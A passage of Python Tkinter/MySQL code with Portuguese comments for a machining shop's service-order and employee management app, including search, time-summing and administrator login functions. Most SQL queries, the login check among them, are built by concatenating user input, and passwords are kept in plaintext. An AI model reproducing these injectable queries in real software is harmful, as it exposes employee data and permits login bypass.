v15 = self.box15.get()
v16 = self.box16.get()
v17 = self.box17.get()
v18 = self.box18.get()
v19 = self.box19.get()
v20 = self.box20.get()
v21 = self.box21.get()
v22 = self.box22.get()
v23 = self.box23.get()
v24 = self.box24.get()
v25 = self.box25.get()
v26 = self.box26.get()
v27 = self.box27.get()
v28 = self.box28.get()
v29 = self.box29.get()
v30 = self.box30.get()
v31 = self.box31.get()
v32 = self.box32.get()
v33 = self.box33.get()
v34 = self.box34.get()
v35 = self.box35.get()
v36 = self.box36.get()
v37 = self.box37.get()
v38 = self.box38.get()
v39 = self.box39.get()
v40 = self.box40.get()
v41 = self.box41.get()
listaNivel = [v1,v2,v3,v4,v5,v6,v7,v8,v9,v10,v11,v12,v13,v14,v15,v16,v17,v18,v19,v20,v21,v22,v23,v24,v25,v26,v27,v28,v29,v30,v31,v32,v33,v34,v35,v36,v37,v38,v39,v40,v41]
try:
#Atualizando os dados pessoais da tabela de funcionarios
self.cursor.execute("UPDATE funcionarios SET Nome='"+a+"', CPF='"+b+"', Senha='"+c+"', Funcao='"+e+"', Telefone='"+f+"', Data_Nasc='"+g+"' where CPF = '"+self.cpf_funcionario+"'")
#Atualizando dados das habilidade do funcionario da tabela habilidade_funcionario
self.cursor.execute("select id from competencia where idOperador = '"+self.id_funcionario+"'")
listaId = self.cursor.fetchall()
for n in range(len(listaNivel)):
self.cursor.execute("UPDATE competencia SET Nivel = '"+listaNivel[n]+"' where id = '"+str(listaId[n][0])+"'")
except Exception as erro:
print(f'{erro}, {(erro.__class__)}')
if messagebox.showerror('Alerta', 'Erro ao atualizar dados'):
return ''
#Convertendo imagem para binário caso tenha alterado a foto de perfil
with open(self.arquivoIMG, 'rb') as arquivoBinary:
self.imageBinary = arquivoBinary.read()
valores = (self.imageBinary, self.cpf_funcionario)
try:
#Alterando imagem de perfil no banco de dados
self.cursor.execute("UPDATE funcionarios SET Foto = (%s) WHERE CPF = (%s)", valores)
#Deletando todas linhas de funcionários da Treeview
self.viewFuncionarios.delete(*self.viewFuncionarios.get_children())
#Buscando os seguintes dados atualizado apra inserir na Treeview
self.cursor.execute('select id, Nome, Funcao, CPF from funcionarios')
valido = self.cursor.fetchall()
except Exception as erro:
print(f'{erro}, {(erro.__class__)}')
if messagebox.showerror('Alerta', 'Erro ao realizar atualização e busca no Banco de Dados'):
return ''
if len(valido) >= 1:
for i in range(len(valido)):
idd = valido[i][0]
nome = valido[i][1]
funcao = valido[i][2]
CPF = valido[i][3]
#Linha após linha cada registro do banco de dado de funcionários
self.viewFuncionarios.insert("", "end", values=(idd, nome, funcao, CPF))
if messagebox.showinfo("Alteração Concluida", "Dados alterado com sucesso!"):
self.limpar_aba_cadastrar('fim_alteração')
def atualiza_valores_funcionario(self):
#Fazendo Consulta MySQL para verificação de quantos Funcionários existem cadastrados
self.cursor.execute("select * from funcionarios where Membro = 'ativo' ")
valido = self.cursor.fetchall()
self.nFunc = len(valido)
self.lbFunc['text'] = str(self.nFunc)
def buscar(self, args):
tipo = self.boxTipo.get()
pesquisa = self.boxPesquisar.get()
campo = self.campoBusca.get().capitalize()
#Deletando todos os registros da treeview
self.viewOrdemServico.delete(*self.viewOrdemServico.get_children())
#Mudando o nome do dado para o jeito que está salvo no banco de dados
if tipo == 'Retrabalho OS':
tipo = 'Retrabalhar OS'
if tipo != 'Tudo':
tipo = "Tipo = '"+tipo+"'"
else:
tipo = "Tipo IN ('Nova OS', 'Retrabalhar OS')"
#Mudando o nome do dado para o jeito que está salvo no banco de dados
if pesquisa == 'Nome': pesquisa = 'Operador'
elif pesquisa == 'CPF': pesquisa = 'CPF'
elif pesquisa == 'Nº Peça': pesquisa = 'CodigoPeca'
elif pesquisa == 'Nº Operação': pesquisa = 'CodigoOperacao'
try:
if campo == '':
self.cursor.execute("select ID, Operador, CodigoPeca, CodigoOperacao, Quant, Tipo, Maquina from concluidas where "+tipo+" and OS = "+self.pegarOS)
else:
self.cursor.execute("select ID, Operador, CodigoPeca, CodigoOperacao, Quant, Tipo, Maquina from concluidas where "+tipo+" and OS = "+self.pegarOS+" and "+pesquisa+" like '%"+campo+"%' ")
valido = self.cursor.fetchall()
if len(valido) == 0:
self.labelerro['text'] = 'Nenhum Registro Encontrado'
self.labelerro.place(relx=0.430, rely=0.500)
return 0
else:
self.labelerro.place_forget()
for i in range (len(valido)):
#extraindo do banco de dados as informações e armazenando nas variáveis
ID = valido[i][0]
Operador = valido[i][1]
CodigoPeca = valido[i][2]
CodigoOperacao = valido[i][3]
Quant = valido[i][4]
Tipo = valido[i][5]
Maquina = valido[i][6]
self.viewOrdemServico.insert("", "end", values=(ID, Operador, CodigoPeca, CodigoOperacao, Quant, Tipo, Maquina))
except Exception as erro:
print(f'{erro}, {(erro.__class__)}')
def buscar2(self, args):
#Caso não tenha nehuma OS Pausada, o label que informa 0 pausas
self.lbl.place_forget()
pesquisa = self.boxPesquisar2.get()
campo = self.campoBusca2.get().capitalize()
#Deletando todos os registros da treeview
self.viewPausas.delete(*self.viewPausas.get_children())
#Mudando o nome do dado para o jeito que está salvo no banco de dados
if pesquisa == 'Nome': pesquisa = 'Operador'
elif pesquisa == 'CPF': pesquisa = 'CPF'
try:
if campo == '':
self.cursor.execute("select ID, Operador, MotivoPause, Tipo, Maquina from pausas where OS = "+self.pegarOS)
valido = self.cursor.fetchall()
if len(valido) == 0:
self.labelerro2.place_forget()
self.lbl.place(relx=0.500, rely=0.500, anchor='center')
return 0
else:
self.cursor.execute("select ID, Operador, MotivoPause, Tipo, Maquina from pausas where OS = "+self.pegarOS+" and "+pesquisa+" like '%"+campo+"%' ")
valido = self.cursor.fetchall()
if len(valido) == 0:
self.labelerro2['text'] = 'Nenhum Registro Encontrado'
self.labelerro2.place(relx=0.500, rely=0.500, anchor='center')
return 0
else:
self.labelerro2.place_forget()
for i in range (len(valido)):
#extraindo do banco de dados as informações e armazenando nas variáveis
ID = valido[i][0]
Operador = valido[i][1]
MotivoPause = valido[i][2]
Tipo = valido[i][3]
Maquina = valido[i][4]
self.viewPausas.insert("", "end", values=(ID, Operador, MotivoPause, Tipo, Maquina))
except Exception as erro:
print(f'{erro}, {(erro.__class__)}')
def exibir_info_tempo_horas(self, args):
try:
selecionada = self.viewOrdemServico.selection()[0]
idd = self.viewOrdemServico.item(selecionada, "values")
#Ocultando label de informação
self.lblSemInformacao.place_forget()
except: return ''
self.cursor.execute("select TempProgramado, TempOperando, TempGasto, TempGastoExt from concluidas where id = '"+idd[0]+"'")
valido = self.cursor.fetchall()
if valido != []:
#Configurando texto e formatando
self.dadosTempoProgramado['text'] = valido[0][0]
self.dadosTempoOperando['text'] = valido[0][1]
self.dadosTempoGasto['text'] = valido[0][2]
self.dadosTempoExtra['text'] = valido[0][3]
else:
self.dadosTempoProgramado['text'] = '0:00:00'
self.dadosTempoOperando['text'] = '0:00:00'
self.dadosTempoGasto['text'] = '0:00:00'
self.dadosTempoExtra['text'] = '0:00:00'
self.dadosTempoProgramado['font'] = ('arial', 13)
self.dadosTempoOperando['font'] = ('arial', 13)
self.dadosTempoGasto['font'] = ('arial', 13)
self.dadosTempoExtra['font'] = ('arial', 13)
#Posições dos Label's informando o que o determinado espaço representa
self.lb1.place(relx=0.010, rely=0.150)
self.lb2.place(relx=0.010, rely=0.350)
self.lb3.place(relx=0.010, rely=0.550)
#Posições dos ícones com simbolo de check
self.img1.place(relx=0.740, rely=0.150)
self.img2.place(relx=0.800, rely=0.350)
self.img3.place(relx=0.620, rely=0.550)
#Posições dos dados ao serem selecionado para informatizar a hora/tempo
self.dadosTempoProgramado.place(relx=0.300, rely=0.250)
self.dadosTempoOperando.place(relx=0.300, rely=0.450)
self.dadosTempoGasto.place(relx=0.300, rely=0.650)
#Exibindo Tempo Extra apenas se tiver Tempo Extra
try:
if str(valido[0][3]) != '0:00:00':
self.lb4.place(relx=0.010, rely=0.750)
self.img4.place(relx=0.600, rely=0.750)
self.dadosTempoExtra.place(relx=0.300, rely=0.850)
else:
self.lb4.place_forget()
self.img4.place_forget()
self.dadosTempoExtra.place_forget()
except: pass
def classificar_coluna(self, por, sinal):
atributo = por
try:
if sinal == 0:
self.sinal = 1
ordem = 'DESC'
elif sinal == 1:
self.sinal = 0
ordem = 'ASC'
self.cursor.execute("select ID, Operador, CodigoPeca, CodigoOperacao, Quant, Tipo, Maquina from concluidas where OS = "+self.pegarOS+" order by "+str(atributo)+" "+ordem+" ")
valido = self.cursor.fetchall()
except Exception as erro:
print(f'{erro}, {(erro.__class__)}')
#Deletando todos os registros da treeview
self.viewOrdemServico.delete(*self.viewOrdemServico.get_children())
messagebox.showerror(parent=self.janelaInicial, title='Alerta', message='Erro ao comunicar-se com Banco de Dados')
return ''
#Deletando todos os registros da treeview
self.viewOrdemServico.delete(*self.viewOrdemServico.get_children())
for i in range (len(valido)):
#extraindo do banco de dados as informações e armazenando nas variáveis
ID = valido[i][0]
Operador = valido[i][1]
CodigoPeca = valido[i][2]
CodigoOperacao = valido[i][3]
Quant = valido[i][4]
Tipo = valido[i][5]
Maquina = valido[i][6]
self.viewOrdemServico.insert("", "end", values=(ID, Operador, CodigoPeca, CodigoOperacao, Quant, Tipo, Maquina))
def remover_focus(self, event, objeto):
#Configurando objeto para retirar a seleção
objeto.selection_set()
try:
#Exibindo posição de label com a mensagem "Sem informações"
self.lblSemInformacao.place(relx=0.5, rely=0.5, anchor="center")
self.dadosTempoProgramado.place_forget()
self.dadosTempoOperando.place_forget()
self.dadosTempoGasto.place_forget()
self.dadosTempoExtra.place_forget()
#Escondendo Labels cabeçários
self.lb1.place_forget()
self.lb2.place_forget()
self.lb3.place_forget()
self.img4.place_forget()
#Escondendo labels com imagens de checagem
self.img1.place_forget()
self.img2.place_forget()
self.img3.place_forget()
self.lb4.place_forget()
except:
pass
def transformar_tempo_decimal(self, thora, tminu, tsegu):
if int(thora) > 0 and int(thora) < 10:
A = int(thora) / 100
B = str(A)
final1 = B[2:]
elif int(thora) == 0:
final1 = '00'
else:
final1 = str(thora)
if int(tminu) > 0 and int(tminu) < 10:
A = int(tminu) / 100
B = str(A)
final2 = B[2:]
elif int(tminu) == 0:
final2 = '00'
else:
final2 = str(tminu)
if int(tsegu) > 0 and int(tsegu) < 10:
A = int(tsegu) / 100
B = str(A)
final3 = B[2:]
elif int(tsegu) == 0:
final3 = '00'
else:
final3 = str(tsegu)
return final1+':'+final2+':'+final3
def somar_total_horas_gastas_os(self, parametro, args):
#Variáveis auxiliar
contDia = 0
#Lista para armazenar o resultado total da Hora, Minuto, Segundo
result = [0,0,0]
try:
#Selecionada a O.S enviada por parametro pora obter seu tempo total de duração
self.cursor.execute(parametro)
totalHoraGastaOS = self.cursor.fetchall()
except:
print("Não conseguimos Obter o Tempo Total desta O.S :'(")
#Se o argumento for 1 então irá somar 1 coluna de várias linhas do banco de dados
if args == 1:
for valor in totalHoraGastaOS:
#SOMANDO O TOTAL DE HORAS DE CADA OPEÇÃO PARA O OBTER O TEMPO BRUTO
horario1 = str(valor[0])
if 'day' in horario1:
horario1 = horario1.replace(':', ' ').split()
contDia += int(horario1[0])
hora = int(horario1[2])
minu = int(horario1[3])
sec = int(horario1[4])
else:
horario1 = horario1.replace(':', ' ').split()
hora = int(horario1[0])
minu = int(horario1[1])
sec = int(horario1[2])
result[2] += sec
if result[2] >= 60:
result[2] -= 60
result[1] += 1
result[1] += minu
if result[1] >= 60:
result[1] -= 60
result[0] += 1
result[0] += hora
#Se o argumento for 2 então irá somar 2 coluna de várias linhas do banco de dados
elif args == 2:
for valor in totalHoraGastaOS:
#SOMANDO OS O TEMPO GASTO E O TEMPO EXTRA DE CADA 0PERAÇÃO REFERIDA A O.S SELECIOANDA
horario1 = str(valor[0])
horario1 = horario1.replace(':', ' ').split()
hora = int(horario1[0])
minu = int(horario1[1])
sec = int(horario1[2])
horario2 = str(valor[1])
horario2 = horario2.replace(':', ' ').split()
hora2 = int(horario2[0])
minu2 = int(horario2[1])
sec2 = int(horario2[2])
result[2] = result[2] + sec + sec2
if result[2] >= 60:
result[2] -= 60
result[1] += 1
result[1] = result[1] + minu + minu2
if result[1] >= 60:
result[1] -= 60
result[0] += 1
result[0] = result[0] + hora + hora2
resultadoTempo = self.transformar_tempo_decimal(result[0], result[1], result[2])
if contDia != 0:
if contDia > 0:
a1 = 'dias'
else: a1 = 'dia'
resultadoTempo = (f"{str(contDia)} {a1} e {resultadoTempo}")
return resultadoTempo
def centraliza_tela(self, larg, alt, jane):
# Dimensões da Janela
largura = larg
altura = alt
# Resolução do Sistema
largura_screen = jane.winfo_screenwidth()
altura_screen = jane.winfo_screenheight()
# Definição da Janela
posicaoX = largura_screen / 2 - largura / 2
posicaoY = altura_screen / 2 - altura / 2
# Posicão da Tela
return jane.geometry('%dx%d+%d+%d' % (largura, altura, posicaoX, posicaoY))
def sumir_widgets(self):
try:
self.frameExibirTotalOperacao.place_forget()
self.frameDadosTempo.place_forget()
self.frameDadosTreeview.place_forget()
self.remover_focus('', self.viewOrdemServico)
self.labelTipo.place_forget()
self.boxTipo.place_forget()
self.labelPesquisar.place_forget()
self.boxPesquisar.place_forget()
self.campoBusca.place_forget()
self.botBuscar.place_forget()
self.botAtribuirOper.place_forget()
except: pass
try:
self.frameDadosTreeviewPause.place_forget()
self.remover_focus('', self.viewPausas)
self.labelTipo2.place_forget()
self.boxTipo2.place_forget()
self.labelPesquisar2.place_forget()
self.boxPesquisar2.place_forget()
self.campoBusca2.place_forget()
self.botBuscar2.place_forget()
except:
pass
try:
self.botAddPeca.place_forget()
self.frameDadosTreeviewPecas.place_forget()
except: pass
try:
self.frameInfoRelatorio.place_forget()
except: pass
def botao_exibir_inicio(self):
self.sumir_widgets()
#self.frameExibirTotalOperacao.place(relx=0.010, rely=0.050, relwidth=0.160, relheight=0.200)
#self.frameDadosTempo.place(relx=0.010, rely=0.300, relwidth=0.160, relheight=0.650)
self.frameDadosTreeview.place(relx=0.400, rely=0.680, relwidth=0.750, relheight=0.600, anchor='center')
'''
self.labelTipo.place(relx=0.200, rely=0.300)
self.boxTipo.place(relx=0.200, rely=0.340, relwidth=0.070)
self.labelPesquisar.place(relx=0.300, rely=0.300)
self.boxPesquisar.place(relx=0.300, rely=0.340, relwidth=0.070)
self.campoBusca.place(relx=0.400, rely=0.340, relwidth=0.210)
self.botBuscar.place(relx=0.610, rely=0.335)
'''
def botao_exibir_pausas(self):
self.sumir_widgets()
'''
self.labelTipo2.place(relx=0.070, rely=0.300)
self.boxTipo2.place(relx=0.070, rely=0.340, relwidth=0.070)
self.labelPesquisar2.place(relx=0.170, rely=0.300)
self.boxPesquisar2.place(relx=0.170, rely=0.340, relwidth=0.070)
self.campoBusca2.place(relx=0.270, rely=0.340, relwidth=0.210)
self.botBuscar2.place(relx=0.480, rely=0.335)
'''
self.frameDadosTreeviewPause.place(relx=0.400, rely=0.680, relwidth=0.750, relheight=0.600, anchor='center')
def botao_exibir_pecas(self):
self.sumir_widgets()
#self.botAtribuirOper.place(relx=0.100, rely=0.340)
self.botAddPeca.place(relx=0.885, rely=0.025)
self.frameDadosTreeviewPecas.place(relx=0.400, rely=0.680, relwidth=0.750, relheight=0.600, anchor='center')
def botao_exibir_sobre(self):
self.sumir_widgets()
self.frameInfoRelatorio.place(relx=0.500, rely=0.600, anchor="center", relheight=0.600)
def chamar_proxima_folha(self):
if self.prox < 3:
self.prox += 1
if self.prox == 1:
self.frameAt1.place_forget()
self.frameAt2.place_forget()
self.acessoSimultaneoOperacao.place_forget()
self.botAnterior.place(relx=0.580, rely=0.900)
self.frameAt3.place(relx=0.100, rely=0.200, relwidth=0.800, relheight=0.580)
self.acessoSimultaneoMaquina.place(relx=0.540, rely=0.780)
self.botProximo['state'] = DISABLED
self.botProximo.place(relx=0.770, rely=0.900)
self.verificar_frame1('')
if self.acessOperacao.get() != 1:
self.acessoSimultaneoMaquina['state'] = DISABLED
else:
self.acessoSimultaneoMaquina['state'] = NORMAL
elif self.prox == 2:
self.frameAt3.place_forget()
self.acessoSimultaneoMaquina.place_forget()
self.frameAt4.place(relx=0.100, rely=0.200, relwidth=0.800, relheight=0.580)
self.acessoSimultaneoOperador.place(relx=0.540, rely=0.780)
self.botProximo['state'] = DISABLED
self.botProximo.place(relx=0.770, rely=0.900)
self.verificar_frame1('')
if self.acessOperacao.get() != 1:
self.acessoSimultaneoOperador['state'] = DISABLED
else:
self.acessoSimultaneoOperador['state'] = NORMAL
elif self.prox == 3:
self.frameAt4.place_forget()
self.acessoSimultaneoOperador.place_forget()
self.botProximo.place_forget()
self.frameAt5.place(relx=0.100, rely=0.200, relwidth=0.800, relheight=0.580)
self.botConcluir.place(relx=0.770, rely=0.900)
#FORMATANDO TEMPO POR OPERAÇÃO
tempA = int(self.campoHora.get())
tempB = int(self.campoMinuto.get())
tempC = int(self.campoSegundo.get())
self.tempPorOper = self.transformar_tempo_decimal(tempA, tempB, tempC)
#CALCULANDO TEMPO BRUTO A SER PROGRAMADO DADO POR CADA OPERAÇÃO
tempH = 0
tempS = 0
tempM = 0
for q in range(int(self.campoQuant.get())):
tempH += int(self.campoHora.get())
tempS += int(self.campoSegundo.get())
tempM += int(self.campoMinuto.get())
#Convertendo minutos em horas caso os minutos passarem de 60
if tempS >= 60:
tempM += 1
tempS = tempS - 60
if tempM >= 60:
tempH += 1
tempM = tempM - 60
self.tempProgramado = self.transformar_tempo_decimal(tempH, tempM, tempS)
#EXBINDO AS MÁQUINAS SELECIONADAS PARA A OPERAÇÃO ESCOLHIDA
self.dados1['text'] = self.pegarOS
self.dados2['text'] = self.campoPeca.get()
self.dados3['text'] = self.operacaoSelect.get()
self.dados4['text'] = self.campoQuant.get()
self.dados5['text'] = self.tempProgramado
textFormat = ''
for i in self.listaMaquina:
if i[1].get() == '1':
try:
self.cursor.execute("select Maquina from maquinas where Codigo = '"+str(i[0])+"'")
maquinaSelect = self.cursor.fetchall()
except Exception as erro:
print(f'{erro}, {(erro.__class__)}')
textFormat += ', '+ maquinaSelect[0][0]
self.text1['state'] = NORMAL
self.text1.delete("1.0", "end")
self.text1.insert(END, textFormat[2:])
self.text1['state'] = DISABLED
#EXBINDO OS OPERADORES SELECIONADOS PARA A OPERAÇÃO ESCOLHIDA
textFormat2 = ''
for i in self.listaFuncionario:
if i[0].get() == '1':
try:
self.cursor.execute("select Nome from Funcionarios where CPF = '"+str(i[1])+"'")
funcionarioSelect = self.cursor.fetchall()
except Exception as erro:
print(f'{erro}, {(erro.__class__)}')
textFormat2 += ', '+ funcionarioSelect[0][0]
self.text2['state'] = NORMAL
self.text2.delete("1.0", "end")
self.text2.insert(END, textFormat2[2:])
self.text2['state'] = DISABLED
def voltar_folha_anterior(self):
if self.prox > 0:
self.prox -= 1
if self.prox == 0:
self.frameAt1.place(relx=0.100, rely=0.200, relwidth=0.800, relheight=0.280)
self.frameAt2.place(relx=0.100, rely=0.530, relwidth=0.800, relheight=0.250)
self.acessoSimultaneoOperacao.place(relx=0.540, rely=0.780)
self.botAnterior.place_forget()
self.frameAt3.place_forget()
self.acessoSimultaneoMaquina.place_forget()
self.verificar_frame1('')
if self.prox == 1:
self.frameAt3.place(relx=0.100, rely=0.200, relwidth=0.800, relheight=0.580)
self.acessoSimultaneoMaquina.place(relx=0.540, rely=0.780)
self.frameAt4.place_forget()
self.acessoSimultaneoOperador.place_forget()
self.verificar_frame1('')
elif self.prox == 2:
self.frameAt4.place(relx=0.100, rely=0.200, relwidth=0.800, relheight=0.580)
self.acessoSimultaneoOperador.place(relx=0.540, rely=0.780)
self.botProximo.place(relx=0.770, rely=0.900)
self.frameAt5.place_forget()
self.botConcluir.place_forget()
self.verificar_frame1('')
def inserir_atribuicao(self):
os = self.pegarOS
peca = self.campoPeca.get()
operacao = self.operacaoSelect.get()[:5]
quant = self.campoQuant.get()
tempPorOper = self.tempPorOper
tempProgramado = self.tempProgramado
global dataAberta
dataAberta = str(datetime.now())
try:
self.cursor.execute('select id from operacao where Codigo_Operacao ='+operacao)
idOperacao = self.cursor.fetchall()[0][0]
except:
if messagebox.showerror(parent=self.janelaAtribuir, title='Alerta', message='Erro ao tentar localizar Operação no Banco de Dados'):
return ''
codigo = ''
try:
for c in range(1000000, 10000000):
codigo = str(randint(1000000, 9999999))
self.cursor.execute("select id from ordem_processo where Codigo ="+codigo)
checagem = self.cursor.fetchall()
if len(checagem) == 0:
break
except:
if messagebox.showerror(parent=self.janelaAtribuir, title='Alerta', message='Falha ao executar ação com Banco de Dados'):
return ''
listIdMaquina = list()
try:
for i in self.listaMaquina:
if i[1].get() == '1':
self.cursor.execute("select id from maquinas where Codigo = '"+str(i[0])+"'")
maquinaSelect = self.cursor.fetchall()[0][0]
listIdMaquina.append(maquinaSelect)
except:
if messagebox.showerror(parent=self.janelaAtribuir, title='Alerta', message='Não foi possível buscar por Id da Máquina'):
return ''
listIdFuncionario = list()
try:
for i in self.listaFuncionario:
if i[0].get() == '1':
self.cursor.execute("select id from Funcionarios where CPF = '"+str(i[1])+"'")
funcionarioSelect = self.cursor.fetchall()[0][0]
listIdFuncionario.append(funcionarioSelect)
except:
if messagebox.showerror(parent=self.janelaAtribuir, title='Alerta', message='Não foi possível buscar por Id do Operador'):
return ''
for idMaquina in listIdMaquina:
for idOperador in listIdFuncionario:
#print(f"codigo:{codigo}, os:{os}, peca:{peca}, quant:{quant}, idOperacao:{idOperacao}, idMaquina:{idMaquina}, idOperador:{idOperador}, tempPorOper:{tempPorOper}, tempProgramado:{tempProgramado}, dataAberta:{dataAberta}, Estado: aberta")
#print('')
try:
self.cursor.execute("insert into ordem_processo (Codigo, OS, Peca, Quant, idOperacao, idMaquina, idOperador, TempoPorOperacao, TempoProgramado, DataAberta, DataIniciada, DataFinalizada, Estado) VALUES ('"+codigo+"', '"+os+"', '"+peca+"', '"+quant+"', '"+str(idOperacao)+"', '"+str(idMaquina)+"', '"+str(idOperador)+"', '"+tempPorOper+"', '"+tempProgramado+"', '"+dataAberta+"', NULL, NULL, DEFAULT)")
except Exception as erro:
print(f'{erro}, {(erro.__class__)}')
if messagebox.showerror(parent=self.janelaAtribuir, title='Alerta', message='Falha ao enviar dados para atribuição'):
return ''
self.cursor.execute("select a.id, b.Nome, a.Peca, c.Processo_Usinagem, a.Quant, d.Maquina, a.Estado from ordem_processo as a join funcionarios as b on b.id = a.idOperador join operacao as c on c.id = a.idOperacao join maquinas as d on d.id = a.idMaquina where OS ="+self.pegarOS+" order by id desc limit 1")
valido = self.cursor.fetchall()
self.janelaAtribuir.destroy()
if messagebox.showinfo(parent=self.janelaDetalhesOS, title='Alerta', message='Atribuição realizada com sucesso!'):
#extraindo do banco de dados as informações e armazenando nas variáveis
ID = valido[0][0]
Operador = valido[0][1]
CodigoPeca = valido[0][2]
CodigoOperacao = valido[0][3]
Quant = valido[0][4]
Maquina = valido[0][5]
Estado = valido[0][6]
self.viewOrdemServico.insert("", "end", values=(ID, Operador, CodigoPeca, CodigoOperacao, Quant, Maquina, Estado))
def verificar_frame1(self, args):
try:
if len(self.campoPeca.get()) >=1 and self.campoQuant.get() != '0' and self.operacaoSelect.get() != 'Parado' and len(self.campoHora.get()) >= 1 and len(self.campoMinuto.get()) >= 1 and self.prox == 0:
try:
if int(self.campoHora.get()) == 0 and int(self.campoMinuto.get()) == 0:
self.botProximo['state'] = DISABLED
else:
self.botProximo['state'] = NORMAL
except:
pass
elif self.prox == 1:
v = 0 #variável que ao ser 1 significa que um ou mais de checkbutton foram selecionados
#contando os valores da lista
for i in range(len(self.listaMaquina)):
#se um valor da lista for 1 significa que o checkbutton foi marcado
if self.listaMaquina[i][1].get() == '1':
v = 1 #variável passará a ser 1 porque um ou mais checkbutton foi selecionado
self.controleCheck += 1
#se o controle check for igual a 1 irá armazenar o primeiro checkbutton selecionado
if self.controleCheck == 1:
self.controleOne = self.listaMaquina[i] #armazenando o primeiro checkbutton selecionado
#se v for True então irá habilitar o botão de próximo pois foi selecionado um checkbutton
if v != 0:
self.botProximo['state'] = NORMAL
#Senão o botão continuará desabiitado e controleCheck voltará a ser 0 pois não checkbutton marcado
else:
self.botProximo['state'] = DISABLED
self.controleCheck = 0
#se o botão de acesso simultaneo não estiver ativado não poderá selecionar mais de uma opção
if self.acessMaquina.get() != 1:
#se mais de uma máquina for selecionada
if self.controleCheck > 1:
for i in range(len(self.listaMaquina)):
#Todas irá ser desmarcada, menos o primeiro
if self.listaMaquina[i] != self.controleOne:
self.listaMaquina[i][1].set(0)
elif self.prox == 2:
v = 0
for i in range(len(self.listaFuncionario)):
if self.listaFuncionario[i][0].get() == '1':
v = 1
self.controleCheck2 += 1
#se o controle check for igual a 1 irá armazenar o primeiro funcionário selecionado
if self.controleCheck2 == 1:
self.controleOne2 = self.listaFuncionario[i] #armazenando o primeiro funcionário selecionado
if v != 0:
self.botProximo['state'] = NORMAL
else:
self.botProximo['state'] = DISABLED
self.controleCheck2 = 0
#se o botão de acesso simultaneo não estiver ativado não poderá selecionar mais de uma opção
if self.acessOperador.get() != 1:
#se mais de um operador for selecionado
if self.controleCheck2 > 1:
for i in range(len(self.listaFuncionario)):
#Todos irá ser desmarcado, menos o primeiro
if self.listaFuncionario[i] != self.controleOne2:
self.listaFuncionario[i][0].set(0)
else:
self.botProximo['state'] = DISABLED
except Exception as erro: print(f'{erro}, {(erro.__class__)}')
def confirmar_login(self, event):
self.labelError = Label(self.frameLogin, text='', fg='#bf0606', bg='white', width=40, font=('arial', 10))
self.labelError.place(relx=0.180, rely=0.620)
#caso o campo "login" esteja vazio
if self.campSenha.get() == '':
self.labelError['text'] = 'Preencha o campo!'
return ''
#verificando se o campo "login" é numérico e possui 11 caracteres
if str(self.campLogin.get()).isnumeric() and len(self.campLogin.get()) == 11:
self.user = self.campLogin.get()
#verificando se a senha é númerica e possui 4 caracteres
if str(self.campSenha.get()).isnumeric() and len(self.campSenha.get()) == 8:
self.password = self.campSenha.get()
try:
#Tentando buscar usuário que se enquadre ao CPF e SENHA digitado e armazenado nas variáveis a seguir
self.cursor.execute("select Nome from Administrador where CPF = '"+self.user+"' and Senha = '"+self.password+"'")
valido = self.cursor.fetchall()
except Exception as erro:
print(f'{erro}, {(erro.__class__)}')
return messagebox.showerror(parent=self.janelaFuncio, title='03-Error-Servidor', message='03-Error: Não acesso ao servidor.')
#pegando hora atual de login caso encontrar resultado na busca
if len(valido) == 1:
self.campLogin.delete(0, END)
self.campSenha.delete(0, END)
self.janelaFuncio.withdraw()
self.janela_raiz()
#alerta caso o usuário não seja encontrado
else:
return messagebox.showinfo(parent=self.janelaFuncio, title='Alerta', message='Login não Existe!')
#caso o campo "senha" diferentee de 11 caracteres
else:
self.labelError['text'] = 'Usuário ou Senha Incorreta!'
#se caso o campo "login" seja diferente de 11 caracteres
else:
self.labelError['text']= 'Usuário ou Senha Incorreta!'
def sair(self):
if messagebox.askokcancel(parent=self.janelaInicial, title='Alerta', message='Deseja Realmente Sair?'):
'''
try:
#self.encerrando_conexao_database()
print('Conexão com MySQL fechada.')
except:
print('Não foi possível fechar a Conexão com MySQL antes de sair.')
'''
self.janelaInicial.destroy()
self.campLogin.focus_force()
self.janelaFuncio.deiconify()
class Ordem_Servico():
#funções de verificar campos e enviar informações ao banco de dados
def confirmarCamposOrdemServico(self):
if self.campoCliente.get() == '' or self.campoNumOS.get() == '' or self.campoProduto.get() == '' or self.campoQTDE.get() == '' or self.campoDataPrevista.get() == '' or self.campoOrdemAbertura.get() == '' or self.tipoOS.get() == 'Select':
messagebox.showinfo(parent=self.janelaCriarOS, title='Alerta', message='Verifique os Campos')
self.exibir_primeira_aba()
return False
elif len(self.listaPecas.get_children()) == 0:
messagebox.showinfo(parent=self.janelaCriarOS, title='Itens não adcionado', message='É necessário adcionar no mínimo 1 item a lista.')
return False
else:
return True
def inseririndo_dados_os(self):
dataPrevista = self.campoDataPrevista.get()
dataPrevista = dataPrevista[6:]+'-'+dataPrevista[3:5]+'-'+dataPrevista[0:2]
dataAbertura = str(datetime.now())
self.cursor.execute("INSERT INTO ordem_servico VALUES (NULL, '"+self.campoNumOS.get()+"','"+self.campoCliente.get().capitalize()+"','"+self.campoProduto.get().capitalize()+"','"+self.campoQTDE.get()+"','"+self.tipoOS.get()+"','"+dataPrevista+"','"+self.idOrdemAbertura+"','"+dataAbertura+"', NULL, NULL, 'Aberto','"+self.campoComplemento.get('1.0', 'end')+"','"+self.campoObservação.get('1.0', 'end')+"')")
self.cursor.execute('SELECT id FROM ordem_servico WHERE OS = '+self.campoNumOS.get())
idOS = str(self.cursor.fetchall()[0][0])
listaPecaCod = self.listaPecas.get_children()
for item in listaPecaCod:
peca = self.listaPecas.item(item, 'values')
self.cursor.execute("INSERT INTO ordem_pecas VALUES (NULL, '"+idOS+"', '"+peca[0]+"','"+peca[3]+"', 'Novo Item', NULL,DEFAULT)")
def confirmar_tela_os(self):
if not self.confirmarCamposOrdemServico():
return ''
try:
self.inseririndo_dados_os()
except mysql.connector.errors.IntegrityError:
messagebox.showwarning(parent=self.janelaCriarOS, title='Alerta', message='Nº de O.S já existente')
return ''
except Exception as erro:
print(f'{erro}, {(erro.__class__)}')
messagebox.showerror(parent=self.janelaCriarOS, title='Alerta', message='Erro ao tentar inserir dados')
return ''
else:
self.exibir_os_treeview()
#self.OrdemServico.insert("", "end", values=(ID, osDistintas[0][0], DataInicial, HoraInicial, contagemOperacoes, contagemRetrabalho, horaTotal))
if messagebox.showinfo(parent=self.janelaCriarOS, title='Alerta', message='Ordem de Serviço aberta com sucesso'):
self.janelaCriarOS.destroy()
def exibir_os_treeview(self):
try:
ultimoID = self.OrdemServico.get_children()[-1]
ultimoID = vez = self.OrdemServico.item(ultimoID)["values"]
ultimoID = ultimoID[0]
except:
ultimoID = 0
